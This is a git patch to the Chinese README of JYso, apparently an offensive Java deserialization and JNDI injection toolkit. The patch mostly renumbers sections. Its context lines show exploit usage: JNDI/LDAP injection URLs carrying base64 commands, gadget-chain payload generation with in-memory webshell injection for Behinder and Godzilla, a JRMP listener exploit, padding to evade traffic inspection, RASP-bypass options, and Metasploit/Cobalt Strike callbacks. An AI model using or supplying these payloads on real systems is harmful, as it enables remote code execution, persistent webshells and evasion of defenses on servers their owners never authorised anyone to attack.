From 08f4e631b690630889157de6765c2db78739f8a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Thu, 14 Mar 2024 09:23:08 +0800 Subject: [PATCH] =?UTF-8?q?Updated=20JYso=E2=80=90CN=20(markdown)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JYso‐CN.md | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/JYso‐CN.md b/JYso‐CN.md index 04f62aa..fa22aaf 100644 --- a/JYso‐CN.md +++ b/JYso‐CN.md @@ -605,11 +605,7 @@ ldap://127.0.0.1:1389/Deserialization/URLDNS/command/Base64/[base64_encoded_all: 对于 BeanShell1,还通过 ScriptEngineManager 执行 JS 的方式支持回显或内存马的打入。使用方式同上:`EX-` -## 1.9 防御的绕过 - -这部分不涉及使用方式,只是简单的描述一下项目中所使用的绕过方式供大家了解。 - -## 2.0 流量层面 +## 1.9 流量层面 对于冰蝎和哥斯拉,他们自己在流量和Java层都有很多可以提取的特征,这里没有办法去管控,需要各位自行去魔改,其实也并不难。本项目把一些大家实现的比较类似的一些特征进行了去除。 @@ -626,14 +622,14 @@ java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' 可以生成填充了 50000 个脏字符的序列化数据 -## 2.1 RASP 层面 +## 2.0 RASP 层面 对于漏洞执行常使用的 Runtime、URLClassLoader 等,很多 RASP 都进行了 Hook,在攻击时可能会被拦截,这里我使用了一些反射调用 native 方法之类的技术去尝试 RASP 的防御,具体的技术实现就不细说了,感兴趣的朋友可以反编译 jar 包查看相关代码。 可以使用 -o 参数指定使用绕过 RASP 的相关技术。 目前已支持动态生成混淆的类名,不存在任何 `qi4l` 关键字。 -## 2.2 Exploit +## 2.1 Exploit 除了单独的参数外,其余参数与 payload 的参数保持一致 @@ -652,7 +648,7 @@ java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' java -cp JYso-[version].jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections1 -p whoami ``` -## 2.3 普通命令执行 +## 2.2 普通命令执行 + JNDI-Injection-Exploit 用法: ``` @@ -664,6 +660,6 @@ jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass ]/command/base64/[base64cmd] -y -g [Gadget] -p "calc" ``` -## 2.4 MSF/CS 上线 +## 2.3 MSF/CS 上线 使用 MSF 的上线载荷配合远程 Jar 包调用完成 MSF 上线,后续可转 CS。 \ No newline at end of file